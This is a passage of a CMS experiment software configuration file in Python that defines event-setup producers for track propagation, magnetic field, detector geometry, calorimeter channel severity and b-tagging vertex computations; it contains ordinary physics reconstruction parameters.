NumberTechnicalTriggers = cms.uint32( 64 ),
NumberPhysTriggersExtended = cms.uint32( 64 ),
WordLength = cms.int32( 64 ),
OrderConditionChip = cms.vint32( 1 ),
appendToDataLabel = cms.string( "" )
)
HcalGeometryFromDBEP = cms.ESProducer( "HcalGeometryFromDBEP",
applyAlignment = cms.bool( False )
)
HcalTopologyIdealEP = cms.ESProducer( "HcalTopologyIdealEP",
Exclude = cms.untracked.string( "" ),
MergePosition = cms.untracked.bool( True ),
appendToDataLabel = cms.string( "" )
)
MaterialPropagator = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterial" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
MaterialPropagatorForHI = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialForHI" ),
Mass = cms.double( 0.139 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
MaterialPropagatorParabolicMF = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialParabolicMf" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
OppositeMaterialPropagator = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialOpposite" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
OppositeMaterialPropagatorForHI = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialOppositeForHI" ),
Mass = cms.double( 0.139 ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
OppositeMaterialPropagatorParabolicMF = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
OppositePropagatorWithMaterialForMixedStep = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( 0.1 )
)
ParametrizedMagneticFieldProducer = cms.ESProducer( "AutoParametrizedMagneticFieldProducer",
version = cms.string( "Parabolic" ),
label = cms.untracked.string( "ParabolicMf" ),
valueOverride = cms.int32( -1 )
)
PropagatorWithMaterialForLoopers = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 4.0 ),
ComponentName = cms.string( "PropagatorWithMaterialForLoopers" ),
Mass = cms.double( 0.1396 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
PropagatorWithMaterialForMixedStep = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialForMixedStep" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( 0.1 )
)
RPCGeometryESModule = cms.ESProducer( "RPCGeometryESModule",
fromDDD = cms.untracked.bool( False ),
fromDD4hep = cms.untracked.bool( False ),
appendToDataLabel = cms.string( "" )
)
SiStripClusterizerConditionsESProducer = cms.ESProducer( "SiStripClusterizerConditionsESProducer",
QualityLabel = cms.string( "" ),
Label = cms.string( "" ),
appendToDataLabel = cms.string( "" )
)
SiStripGainESProducer = cms.ESProducer( "SiStripGainESProducer",
appendToDataLabel = cms.string( "" ),
printDebug = cms.untracked.bool( False ),
AutomaticNormalization = cms.bool( False ),
APVGain = cms.VPSet(
cms.PSet( NormalizationFactor = cms.untracked.double( 1.0 ),
Label = cms.untracked.string( "" ),
Record = cms.string( "SiStripApvGainRcd" )
),
cms.PSet( NormalizationFactor = cms.untracked.double( 1.0 ),
Label = cms.untracked.string( "" ),
Record = cms.string( "SiStripApvGain2Rcd" )
)
)
)
SiStripQualityESProducer = cms.ESProducer( "SiStripQualityESProducer",
appendToDataLabel = cms.string( "" ),
ListOfRecordToMerge = cms.VPSet(
cms.PSet( record = cms.string( "SiStripDetVOffRcd" ),
tag = cms.string( "" )
),
cms.PSet( record = cms.string( "SiStripDetCablingRcd" ),
tag = cms.string( "" )
),
cms.PSet( record = cms.string( "SiStripBadChannelRcd" ),
tag = cms.string( "" )
),
cms.PSet( record = cms.string( "SiStripBadFiberRcd" ),
tag = cms.string( "" )
),
cms.PSet( record = cms.string( "SiStripBadModuleRcd" ),
tag = cms.string( "" )
)
),
ReduceGranularity = cms.bool( False ),
ThresholdForReducedGranularity = cms.double( 0.3 ),
PrintDebugOutput = cms.bool( False ),
UseEmptyRunInfo = cms.bool( False )
)
SiStripRecHitMatcherESProducer = cms.ESProducer( "SiStripRecHitMatcherESProducer",
ComponentName = cms.string( "StandardMatcher" ),
NSigmaInside = cms.double( 3.0 ),
PreFilter = cms.bool( False )
)
SiStripRegionConnectivity = cms.ESProducer( "SiStripRegionConnectivity",
EtaDivisions = cms.untracked.uint32( 20 ),
PhiDivisions = cms.untracked.uint32( 20 ),
EtaMax = cms.untracked.double( 2.5 )
)
SimpleSecondaryVertex3TrkComputer = cms.ESProducer( "SimpleSecondaryVertexESProducer",
use3d = cms.bool( True ),
unBoost = cms.bool( False ),
useSignificance = cms.bool( True ),
minTracks = cms.uint32( 3 ),
minVertices = cms.uint32( 1 )
)
SteppingHelixPropagatorAny = cms.ESProducer( "SteppingHelixPropagatorESProducer",
ComponentName = cms.string( "SteppingHelixPropagatorAny" ),
NoErrorPropagation = cms.bool( False ),
PropagationDirection = cms.string( "anyDirection" ),
useTuningForL2Speed = cms.bool( False ),
useIsYokeFlag = cms.bool( True ),
endcapShiftInZNeg = cms.double( 0.0 ),
SetVBFPointer = cms.bool( False ),
AssumeNoMaterial = cms.bool( False ),
endcapShiftInZPos = cms.double( 0.0 ),
useInTeslaFromMagField = cms.bool( False ),
VBFName = cms.string( "VolumeBasedMagneticField" ),
useEndcapShiftsInZ = cms.bool( False ),
sendLogWarning = cms.bool( False ),
useMatVolumes = cms.bool( True ),
debug = cms.bool( False ),
ApplyRadX0Correction = cms.bool( True ),
useMagVolumes = cms.bool( True ),
returnTangentPlane = cms.bool( True )
)
TrackerAdditionalParametersPerDetESModule = cms.ESProducer( "TrackerAdditionalParametersPerDetESModule",
appendToDataLabel = cms.string( "" )
)
TrackerDigiGeometryESModule = cms.ESProducer( "TrackerDigiGeometryESModule",
appendToDataLabel = cms.string( "" ),
fromDDD = cms.bool( False ),
applyAlignment = cms.bool( True ),
alignmentsLabel = cms.string( "" )
)
TrackerGeometricDetESModule = cms.ESProducer( "TrackerGeometricDetESModule",
fromDDD = cms.bool( False ),
fromDD4hep = cms.bool( False ),
appendToDataLabel = cms.string( "" )
)
TransientTrackBuilderESProducer = cms.ESProducer( "TransientTrackBuilderESProducer",
ComponentName = cms.string( "TransientTrackBuilder" )
)
VolumeBasedMagneticFieldESProducer = cms.ESProducer( "VolumeBasedMagneticFieldESProducerFromDB",
label = cms.untracked.string( "" ),
debugBuilder = cms.untracked.bool( False ),
valueOverride = cms.int32( -1 )
)
ZdcGeometryFromDBEP = cms.ESProducer( "ZdcGeometryFromDBEP",
applyAlignment = cms.bool( False )
)
caloDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "CaloDetIdAssociator" ),
etaBinSize = cms.double( 0.087 ),
nEta = cms.int32( 70 ),
nPhi = cms.int32( 72 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
cosmicsNavigationSchoolESProducer = cms.ESProducer( "NavigationSchoolESProducer",
ComponentName = cms.string( "CosmicNavigationSchool" ),
SimpleMagneticField = cms.string( "" )
)
ctppsGeometryESModule = cms.ESProducer( "CTPPSGeometryESModule",
verbosity = cms.untracked.uint32( 1 ),
buildMisalignedGeometry = cms.bool( False ),
isRun2 = cms.bool( True ),
dbTag = cms.string( "" ),
compactViewTag = cms.string( "" ),
fromPreprocessedDB = cms.untracked.bool( True ),
fromDD4hep = cms.untracked.bool( False ),
appendToDataLabel = cms.string( "" )
)
ctppsInterpolatedOpticalFunctionsESSource = cms.ESProducer( "CTPPSInterpolatedOpticalFunctionsESSource",
lhcInfoLabel = cms.string( "" ),
opticsLabel = cms.string( "" ),
appendToDataLabel = cms.string( "" )
)
ecalDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "EcalDetIdAssociator" ),
etaBinSize = cms.double( 0.02 ),
nEta = cms.int32( 300 ),
nPhi = cms.int32( 360 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
ecalSeverityLevel = cms.ESProducer( "EcalSeverityLevelESProducer",
flagMask = cms.PSet(
kBad = cms.vstring( 'kFaultyHardware',
'kDead',
'kKilled' ),
kGood = cms.vstring( 'kGood' ),
kRecovered = cms.vstring( 'kLeadingEdgeRecovered',
'kTowerRecovered' ),
kProblematic = cms.vstring( 'kPoorReco',
'kPoorCalib',
'kNoisy',
'kSaturated' ),
kWeird = cms.vstring( 'kWeird',
'kDiWeird' ),
kTime = cms.vstring( 'kOutOfTime' )
),
dbstatusMask = cms.PSet(
kBad = cms.vstring( 'kNonRespondingIsolated',
'kDeadVFE',
'kDeadFE',
'kNoDataNoTP' ),
kGood = cms.vstring( 'kOk' ),
kRecovered = cms.vstring( ),
kProblematic = cms.vstring( 'kDAC',
'kNoLaser',
'kNoisy',
'kNNoisy',
'kNNNoisy',
'kNNNNoisy',
'kNNNNNoisy',
'kFixedG6',
'kFixedG1',
'kFixedG0' ),
kWeird = cms.vstring( ),
kTime = cms.vstring( )
),
timeThresh = cms.double( 2.0 )
)
hcalChannelPropertiesESProd = cms.ESProducer( "HcalChannelPropertiesEP" )
hcalDDDRecConstants = cms.ESProducer( "HcalDDDRecConstantsESModule",
appendToDataLabel = cms.string( "" )
)
hcalDDDSimConstants = cms.ESProducer( "HcalDDDSimConstantsESModule",
appendToDataLabel = cms.string( "" )
)
hcalDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "HcalDetIdAssociator" ),
etaBinSize = cms.double( 0.087 ),
nEta = cms.int32( 70 ),
nPhi = cms.int32( 72 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
hcalRecAlgos = cms.ESProducer( "HcalRecAlgoESProducer",
phase = cms.uint32( 1 ),
RecoveredRecHitBits = cms.vstring( ),
SeverityLevels = cms.VPSet(
cms.PSet( ChannelStatus = cms.vstring( ),
RecHitFlags = cms.vstring( 'TimingFromTDC' ),
Level = cms.int32( 0 )
),
cms.PSet( ChannelStatus = cms.vstring( 'HcalCellCaloTowerProb' ),
RecHitFlags = cms.vstring( ),
Level = cms.int32( 1 )
),
cms.PSet( ChannelStatus = cms.vstring( 'HcalCellExcludeFromHBHENoiseSummary' ),
RecHitFlags = cms.vstring( ),
Level = cms.int32( 5 )
),
cms.PSet( ChannelStatus = cms.vstring( ),
RecHitFlags = cms.vstring( 'HBHEHpdHitMultiplicity',
'HBHEIsolatedNoise',
'HBHEFlatNoise',
'HBHESpikeNoise',
'HBHETS4TS5Noise',
'HBHENegativeNoise',
'HBHEPulseFitBit',
'HBHEOOTPU' ),
Level = cms.int32( 8 )
),
cms.PSet( ChannelStatus = cms.vstring( ),
RecHitFlags = cms.vstring( 'HFLongShort',
'HFS8S1Ratio',
'HFPET',
'HFSignalAsymmetry' ),
Level = cms.int32( 11 )
),
cms.PSet( ChannelStatus = cms.vstring( 'HcalCellHot' ),
RecHitFlags = cms.vstring( ),
Level = cms.int32( 15 )
),
cms.PSet( ChannelStatus = cms.vstring( 'HcalCellOff',
'HcalCellDead' ),
RecHitFlags = cms.vstring( ),
Level = cms.int32( 20 )
)
),
DropChannelStatusBits = cms.vstring( 'HcalCellMask',
'HcalCellOff',
'HcalCellDead' ),
appendToDataLabel = cms.string( "" )
)
hcal_db_producer = cms.ESProducer( "HcalDbProducer" )
hltBoostedDoubleSecondaryVertexAK8Computer = cms.ESProducer( "CandidateBoostedDoubleSecondaryVertexESProducer",
useCondDB = cms.bool( False ),
weightFile = cms.FileInPath( "RecoBTag/SecondaryVertex/data/BoostedDoubleSV_AK8_BDT_v4.weights.xml.gz" ),
useGBRForest = cms.bool( True ),
useAdaBoost = cms.bool( False )
)
hltCombinedSecondaryVertex = cms.ESProducer( "CombinedSecondaryVertexESProducer",
trackPseudoSelection = cms.PSet(
maxDistToAxis = cms.double( 0.07 ),
totalHitsMin = cms.uint32( 0 ),
ptMin = cms.double( 0.0 ),
sip2dSigMax = cms.double( 99999.9 ),
sip2dValMax = cms.double( 99999.9 ),
sip3dSigMax = cms.double( 99999.9 ),
sip3dValMax = cms.double( 99999.9 ),
maxDecayLen = cms.double( 5.0 ),
qualityClass = cms.string( "any" ),
jetDeltaRMax = cms.double( 0.3 ),
normChi2Max = cms.double( 99999.9 ),
pixelHitsMin = cms.uint32( 0 ),
sip2dSigMin = cms.double( 2.0 ),
sip2dValMin = cms.double( -99999.9 ),
sip3dSigMin = cms.double( -99999.9 ),
sip3dValMin = cms.double( -99999.9 )
),
trackSelection = cms.PSet(
maxDistToAxis = cms.double( 0.07 ),
totalHitsMin = cms.uint32( 0 ),
ptMin = cms.double( 0.0 ),
sip2dSigMax = cms.double( 99999.9 ),
sip2dValMax = cms.double( 99999.9 ),
sip3dSigMax = cms.double( 99999.9 ),
sip3dValMax = cms.double( 99999.9 ),
maxDecayLen = cms.double( 5.0 ),
qualityClass = cms.string( "any" ),
jetDeltaRMax = cms.double( 0.3 ),
normChi2Max = cms.double( 99999.9 ),
pixelHitsMin = cms.uint32( 0 ),
sip2dSigMin = cms.double( -99999.9 ),
sip2dValMin = cms.double( -99999.9 ),
sip3dSigMin = cms.double( -99999.9 ),
sip3dValMin = cms.double( -99999.9 )
),
trackFlip = cms.bool( False ),
vertexFlip = cms.bool( False ),
SoftLeptonFlip = cms.bool( False ),
useTrackWeights = cms.bool( True ),
pseudoMultiplicityMin = cms.uint32( 2 ),
correctVertexMass = cms.bool( True ),
trackPairV0Filter = cms.PSet( k0sMassWindow = cms.double( 0.03 ) ),
charmCut = cms.double( 1.5 ),
minimumTrackWeight = cms.double( 0.5 ),
pseudoVertexV0Filter = cms.PSet( k0sMassWindow = cms.double( 0.05 ) ),
trackMultiplicityMin = cms.uint32( 3 ),
trackSort = cms.string( "sip2dSig" ),
useCategories = cms.bool( True ),
calibrationRecords = cms.vstring( 'CombinedSVRecoVertex',
'CombinedSVPseudoVertex',
'CombinedSVNoVertex' ),
recordLabel = cms.string( "HLT" ),
categoryVariableName = cms.string( "vertexCategory" )
)
hltCombinedSecondaryVertexV2 = cms.ESProducer( "CombinedSecondaryVertexESProducer",
trackPseudoSelection = cms.PSet(
max_pT_dRcut = cms.double( 0.1 ),
b_dR = cms.double( 0.6263 ),
min_pT = cms.double( 120.0 ),
b_pT = cms.double( 0.3684 ),
ptMin = cms.double( 0.0 ),
max_pT_trackPTcut = cms.double( 3.0 ),
max_pT = cms.double( 500.0 ),
useVariableJTA = cms.bool( False ),
maxDecayLen = cms.double( 5.0 ),
qualityClass = cms.string( "any" ),
normChi2Max = cms.double( 99999.9 ),
sip2dValMin = cms.double( -99999.9 ),
sip3dValMin = cms.double( -99999.9 ),
a_dR = cms.double( -0.001053 ),
maxDistToAxis = cms.double( 0.07 ),
totalHitsMin = cms.uint32( 0 ),
a_pT = cms.double( 0.005263 ),
sip2dSigMax = cms.double( 99999.9 ),
sip2dValMax = cms.double( 99999.9 ),
sip3dSigMax = cms.double( 99999.9 ),
sip3dValMax = cms.double( 99999.9 ),
min_pT_dRcut = cms.double( 0.5 ),
jetDeltaRMax = cms.double( 0.3 ),
pixelHitsMin = cms.uint32( 0 ),
sip3dSigMin = cms.double( -99999.9 ),
sip2dSigMin = cms.double( 2.0 )
),
trackSelection = cms.PSet(
max_pT_dRcut = cms.double( 0.1 ),
b_dR = cms.double( 0.6263 ),
min_pT = cms.double( 120.0 ),
b_pT = cms.double( 0.3684 ),
ptMin = cms.double( 0.0 ),
max_pT_trackPTcut = cms.double( 3.0 ),
max_pT = cms.double( 500.0 ),
useVariableJTA = cms.bool( False ),
maxDecayLen = cms.double( 5.0 ),
qualityClass = cms.string( "any" ),
normChi2Max = cms.double( 99999.9 ),
sip2dValMin = cms.double( -99999.9 ),
sip3dValMin = cms.double( -99999.9 ),
a_dR = cms.double( -0.001053 ),
maxDistToAxis = cms.double( 0.07 ),
totalHitsMin = cms.uint32( 0 ),
a_pT = cms.double( 0.005263 ),
sip2dSigMax = cms.double( 99999.9 ),
sip2dValMax = cms.double( 99999.9 ),
sip3dSigMax = cms.double( 99999.9 ),
sip3dValMax = cms.double( 99999.9 ),
min_pT_dRcut = cms.double( 0.5 ),
jetDeltaRMax = cms.double( 0.3 ),
pixelHitsMin = cms.uint32( 0 ),
sip3dSigMin = cms.double( -99999.9 ),
sip2dSigMin = cms.double( -99999.9 )
),
trackFlip = cms.bool( False ),
vertexFlip = cms.bool( False ),
SoftLeptonFlip = cms.bool( False ),
useTrackWeights = cms.bool( True ),
pseudoMultiplicityMin = cms.uint32( 2 ),
correctVertexMass = cms.bool( True ),
trackPairV0Filter = cms.PSet( k0sMassWindow = cms.double( 0.03 ) ),
charmCut = cms.double( 1.5 ),
minimumTrackWeight = cms.double( 0.5 ),
pseudoVertexV0Filter = cms.PSet( k0sMassWindow = cms.double( 0.05 ) ),
trackMultiplicityMin = cms.uint32( 3 ),
trackSort = cms.string( "sip2dSig" ),
useCategories = cms.bool( True ),
calibrationRecords = cms.vstring( 'CombinedSVIVFV2RecoVertex',
'CombinedSVIVFV2PseudoVertex',
'CombinedSVIVFV2NoVertex' ),
recordLabel = cms.string( "HLT" ),
categoryVariableName = cms.string( "vertexCategory" )
)
hltDisplacedDijethltESPPromptTrackCountingESProducer = cms.ESProducer( "PromptTrackCountingESProducer",
impactParameterType = cms.int32( 1 ),
minimumImpactParameter = cms.double( -1.0 ),
useSignedImpactParameterSig = cms.bool( True ),
maximumDistanceToJetAxis = cms.double( 999999.0 ),
deltaR = cms.double( -1.0 ),
deltaRmin = cms.double( 0.0 ),
maximumDecayLength = cms.double( 999999.0 ),
maxImpactParameter = cms.double( 0.1 ),
maxImpactParameterSig = cms.double( 999999.0 ),
trackQualityClass = cms.string( "any" ),
nthTrack = cms.int32( -1 )
)
hltDisplacedDijethltESPTrackCounting2D1st = cms.ESProducer( "TrackCountingESProducer",
a_dR = cms.double( -0.001053 ),
b_dR = cms.double( 0.6263 ),
a_pT = cms.double( 0.005263 ),
b_pT = cms.double( 0.3684 ),
min_pT = cms.double( 120.0 ),
max_pT = cms.double( 500.0 ),
min_pT_dRcut = cms.double( 0.5 ),
max_pT_dRcut = cms.double( 0.1 ),
max_pT_trackPTcut = cms.double( 3.0 ),
minimumImpactParameter = cms.double( 0.05 ),
useSignedImpactParameterSig = cms.bool( False ),
impactParameterType = cms.int32( 1 ),
maximumDistanceToJetAxis = cms.double( 9999999.0 ),
deltaR = cms.double( -1.0 ),
maximumDecayLength = cms.double( 999999.0 ),
nthTrack = cms.int32( 1 ),
trackQualityClass = cms.string( "any" ),
useVariableJTA = cms.bool( False )
)
hltESPAnalyticalPropagator = cms.ESProducer( "AnalyticalPropagatorESProducer",
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "hltESPAnalyticalPropagator" ),
PropagationDirection = cms.string( "alongMomentum" )
)
hltESPBwdAnalyticalPropagator = cms.ESProducer( "AnalyticalPropagatorESProducer",
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "hltESPBwdAnalyticalPropagator" ),
PropagationDirection = cms.string( "oppositeToMomentum" )
)
hltESPBwdElectronPropagator = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "hltESPBwdElectronPropagator" ),
Mass = cms.double( 5.11E-4 ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
hltESPChi2ChargeLooseMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeLooseMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeMeasurementEstimator2000 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 2000.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeMeasurementEstimator2000" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeMeasurementEstimator30 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 30.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( 15.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeMeasurementEstimator9ForHI = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeMeasurementEstimator9ForHI" ),
pTChargeCutThreshold = cms.double( 15.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutForHI" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeTightMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeTightMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2MeasurementEstimator100 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 40.0 ),
nSigma = cms.double( 4.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1.0E12 ),
ComponentName = cms.string( "hltESPChi2MeasurementEstimator100" ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2MeasurementEstimator16 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2MeasurementEstimator16" ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2MeasurementEstimator30 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 30.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2MeasurementEstimator30" ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2MeasurementEstimator9 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2MeasurementEstimator9" ),
appendToDataLabel = cms.string( "" )
)
hltESPCloseComponentsMerger5D = cms.ESProducer( "CloseComponentsMergerESProducer5D",
ComponentName = cms.string( "hltESPCloseComponentsMerger5D" ),
MaxComponents = cms.int32( 12 ),
DistanceMeasure = cms.string( "hltESPKullbackLeiblerDistance5D" )
)
hltESPDetachedQuadStepChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPDetachedQuadStepChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPDetachedQuadStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPDetachedQuadStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.13 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPDetachedStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPDetachedStepTrajectoryCleanerBySharedHits" ),
